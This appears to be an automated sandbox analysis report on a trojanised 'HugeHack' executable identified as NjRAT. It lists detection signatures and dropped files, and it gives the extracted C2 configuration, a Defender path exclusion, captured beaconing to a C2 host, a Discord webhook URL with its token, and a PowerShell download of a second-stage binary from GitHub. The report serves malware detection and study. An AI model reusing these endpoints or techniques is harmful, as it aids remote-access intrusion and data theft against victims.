Windows Analysis Report
HugeHack 1.3.exe.bin.exe

Overview

General Information

Sample name: HugeHack 1.3.exe.bin.exe
Analysis ID: 1645836
MD5: a6d81f76e32d232302d5d3e088cbeb16
SHA1: 345f29473e735735a4ad9e63e668f7eb89ce843c
SHA256: 107c0d57d568c7f5e3cce08d6915098a12b1703c75e454ae4600c976dadd8aa8
Tags: exe, user-TornadoAV_dev

Detection

Njrat
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious encrypted Powershell command line found
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Njrat
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Adds a directory exclusion to Windows Defender
Adds extensions / path to Windows Defender exclusion list (Registry)
Contains functionality to log keystrokes (.Net Source)
Creates autostart registry keys with suspicious names
Disables zone checking for all users
Drops PE files to the startup folder
Encrypted powershell cmdline option found
Loading BitLocker PowerShell Module
Protects its processes via BreakOnTermination flag
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Potentially Suspicious Malware Callback Communication
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: System File Execution Location Anomaly
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to detect virtual machines (SLDT)
Contains functionality to query CPU information (cpuid)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Dllhost Internet Connection
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sigma detected: Windows Defender Exclusions Added - Registry
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Stores files to the Windows start menu directory
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Name: NjRAT
Description: RedPacket Security describes NJRat as "a remote access trojan (RAT) has capabilities to log keystrokes, access the victim's camera, steal credentials stored in browsers, open a reverse shell, upload/download files, view the victim's desktop, perform process, file, and registry manipulations, and capabilities to let the attacker update, uninstall, restart, close, disconnect the RAT and rename its campaign ID. Through the Command & Control (CnC) server software, the attacker has capabilities to create and configure the malware to spread through USB drives." It is supposedly popular with actors in the Middle East. Similar to other RATs, many leaked builders may be backdoored.
Attribution:
  • AQUATIC PANDA
  • Earth Lusca
  • Operation C-Major
  • The Gorgon Group
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.njrat

AV Detection

Source: HugeHack 1.3.exe.bin.exe Avira: detected
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe Avira: detection malicious, Label: TR/Spy.Gen8
Source: C:\ClickMe.exe Avira: detection malicious, Label: TR/Spy.Gen8
Source: C:\Users\user\AppData\Roaming\dllhost.exe Avira: detection malicious, Label: TR/Spy.Gen8
Source: C:\Users\user\AppData\Local\Temp\Payload.exe Avira: detection malicious, Label: TR/Spy.Gen8
Source: 2.0.Payload.exe.890000.0.unpack Malware Configuration Extractor: Njrat {"Host": "gabh.gotdns.ch", "Port": "7777", "Version": "<- NjRAT 0.7d Horror Edition ->", "Registry Name": "c382eb151c59bd833b24120723eac541", "Campaign ID": "User", "Network Seprator": "Y262SUCZ4UJJ"}
Source: C:\ClickMe.exe ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Local\Temp\Payload.exe ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Local\Temp\webhook.exe ReversingLabs: Detection: 21%
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Roaming\dllhost.exe ReversingLabs: Detection: 81%
Source: HugeHack 1.3.exe.bin.exe Virustotal: Detection: 76%
Source: HugeHack 1.3.exe.bin.exe ReversingLabs: Detection: 91%
Source: Yara match File source: HugeHack 1.3.exe.bin.exe, type: SAMPLE
Source: Yara match File source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.Payload.exe.303fe20.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.Payload.exe.890000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.HugeHack 1.3.exe.bin.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.Payload.exe.303fe20.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000000.1222141243.0000000000892000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1222228623.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.1216428944.0000000000408000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.3698298941.0000000002931000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1334619345.0000000003031000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: HugeHack 1.3.exe.bin.exe PID: 7552, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Payload.exe PID: 7616, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED
Source: Yara match File source: C:\ClickMe.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Payload.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED
Source: HugeHack 1.3.exe.bin.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: C:\Users\user\AppData\Local\Temp\Payload.exe File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll
Source: unknown HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49724 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.4:49728 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.113.4:443 -> 192.168.2.4:49729 version: TLS 1.2
Source: Binary string: C:\Users\Daniel\program.pdb source: HugeHack 1.3.exe.bin.exe, 00000000.00000003.1224675944.0000000000F78000.00000004.00000020.00020000.00000000.sdmp, webhook.exe, 00000003.00000000.1224355173.0000000000632000.00000002.00000001.01000000.00000008.sdmp

Change of critical system settings

Source: C:\Windows\SysWOW64\reg.exe Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths C:\

Software Vulnerabilities

Source: C:\Windows\SysWOW64\wscript.exe Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 3_2_07F9B248
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 3_2_07F9B244

Networking

Source: Network traffic Suricata IDS: 2033132 - Severity 1 - ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll) : 192.168.2.4:49732 -> 46.121.250.34:7777
Source: Network traffic Suricata IDS: 2021176 - Severity 1 - ET MALWARE Bladabindi/njRAT CnC Command (ll) : 192.168.2.4:49732 -> 46.121.250.34:7777
Source: Network traffic Suricata IDS: 2838486 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi Variant CnC Activity (inf) : 192.168.2.4:49732 -> 46.121.250.34:7777
Source: Network traffic Suricata IDS: 2825566 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (CAP) : 192.168.2.4:49732 -> 46.121.250.34:7777
Source: C:\Users\user\AppData\Roaming\dllhost.exe Network Connect: 46.121.250.34 7777
Source: global traffic TCP traffic: 192.168.2.4:49732 -> 46.121.250.34:7777
Source: global traffic HTTP traffic detected:
  GET / HTTP/1.1
  Host: api.ipify.org
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
  GET / HTTP/1.1
  Host: api.ipify.org
Source: global traffic HTTP traffic detected:
  POST /api/webhooks/1352684770521387070/EnDdIPnq1Toz0toXGIhTo1T09Jq8MMJhXvjTWp5MjXqBLpdpS9QoPUThjc3XSnogFIz9 HTTP/1.1
  Content-Type: application/json
  Host: discordapp.com
  Content-Length: 77
  Expect: 100-continue
  Connection: Keep-Alive
Source: Joe Sandbox View IP Address: 140.82.113.4
Source: Joe Sandbox View IP Address: 162.159.130.233
Source: Joe Sandbox View IP Address: 172.67.74.152
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown DNS query: name: api.ipify.org
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49726 -> 172.67.74.152:443
Source: Network traffic Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49729 -> 140.82.113.4:443
Source: global traffic HTTP traffic detected:
  GET /AnonAm0369/am/raw/refs/heads/main/RuntimeBroker.exe HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
  Host: github.com
  Connection: Keep-Alive
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: api.ipify.org
Source: global traffic DNS traffic detected: DNS query: discordapp.com
Source: global traffic DNS traffic detected: DNS query: github.com
Source: global traffic DNS traffic detected: DNS query: gabh.gotdns.ch
Source: unknown HTTP traffic detected:
  POST /api/webhooks/1352684770521387070/EnDdIPnq1Toz0toXGIhTo1T09Jq8MMJhXvjTWp5MjXqBLpdpS9QoPUThjc3XSnogFIz9 HTTP/1.1
  Content-Type: application/json
  Host: discordapp.com
  Content-Length: 77
  Expect: 100-continue
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Server: GitHub.com
  Date: Sat, 22 Mar 2025 16:34:45 GMT
  Content-Type: text/html; charset=utf-8
  Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
  Cache-Control: no-cache
  Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
  X-Frame-Options: deny
  X-Content-Type-Options: nosniff
  X-XSS-Protection: 0
  Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/warn-on-duplicate-attdefutil/SD
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/warn-on-undeclared-elemdef
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/warn-on-undeclared-elemdefniti:
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/warn-on-duplicate-entitydef
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/warn-on-duplicate-entitydef/w3c/d
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/xinclude
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/xinclude/fixup-base-uris
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/xinclude/fixup-base-uris6
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/xinclude/fixup-language
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/xinclude/fixup-language;
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/dom/current-element-node
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/dom/current-element-nodeU
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/dom/document-class-name
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/dom/document-class-name$
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/input-buffer-size
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/datatype-validator-factory
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/datatype-validator-factoryDocu:
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/document-scanner
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/document-scanner/w3c/d7
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/dtd-processor
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/dtd-processor/5
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/dtd-scanner
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/dtd-scannerm/l8
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/entity-manager
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/entity-manager8
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/entity-resolver
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/error-handler
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/error-handler6
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/error-reporter
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/error-reporter:
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/grammar-pool
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/grammar-pool6
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/namespace-binder
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/namespace-context
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/stax-entity-resolver
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/stax-entity-resolver:
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/symbol-table
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/symbol-tableQ
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/validation-manager
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/validation-managersetBF
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/validation/schema/dv-factory
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/validation/schema/dv-factoryam7
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/validator/dtd
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/validator/dtde:
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/validator/schema
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/xinclude-handler
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/xinclude-handlerm
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/xinclude-handlermPrm
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/locale
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/localedJ
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/schema/external-noNamespaceSchemaLocation
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/schema/external-noNamespaceSchemaLocationetPubl?
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/schema/external-schemaLocation
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/schema/external-schemaLocationdK
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/security-manager
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/security-manager7
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/validation/schema/root-element-declaration
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/validation/schema/root-element-declarationsion
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/validation/schema/root-type-definition
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/validation/schema/root-type-definitionr(
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/w3c/domD
